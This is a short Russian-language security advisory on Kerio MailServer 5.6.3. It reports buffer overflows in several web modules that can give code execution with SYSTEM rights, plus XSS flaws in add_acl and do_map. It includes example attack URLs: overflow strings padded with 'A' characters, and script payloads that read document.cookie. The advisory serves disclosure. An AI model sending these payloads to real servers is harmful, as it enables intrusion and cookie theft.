Несколько уязвимостей обнаружено в Kerio MailServer. Удаленный авторизованный пользователь может выполнить произвольный код с SYSTEM привилегиями. Также обнаружены несколько XSS уязвимостей. 

Удаленный авторизованный пользователь может представить специально сформированное имя пользователя
showuser к модулю do_subscribe, чтобы вызвать переполнение буфера и перезаписать EIP регистр. В результате удаленный пользователь может выполнить произвольный код. Пример: 

http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAA AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAA AAAAAA

Подобные уязвимости обнаружены в add_acl, list, и
do_map модулях. Пример: 

http://[server]/add_acl?folder=~AAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA AAAAA
@localhost/INBOX&add_name=lucas

http://[Server]/list?folder=~AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA@localhost/INBOX

http://[Server]/do_map?action=new&oldalias= eso&alias=aaa&folder=public&user=AAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA
AAAAAAAAAAA AAAAAAAAAAAAA

Также сообщается, что модули add_acl и do_map не фильтруют HTML код в данных, представленных пользователем. Удаленный пользователь может сконструировать специально обработанный URL, содержащий произвольный HTML код, который будет выполнен в браузере пользователя, просматривающего эту ссылку, в контексте уязвимого сайта. Пример: 

http://[server]/add_acl?folder=~ conde0@localhost/INBOX&add_name= <script>alert(document.cook
ie);</script>

http://[Server]/do_map?action= new&oldalias=eso&alias= <script>alert(document.cookie);</script>&
folder=public&user=lucascavadora

Уязвимость обнаружена в Kerio MailServer 5.6.3.



Оставить мнение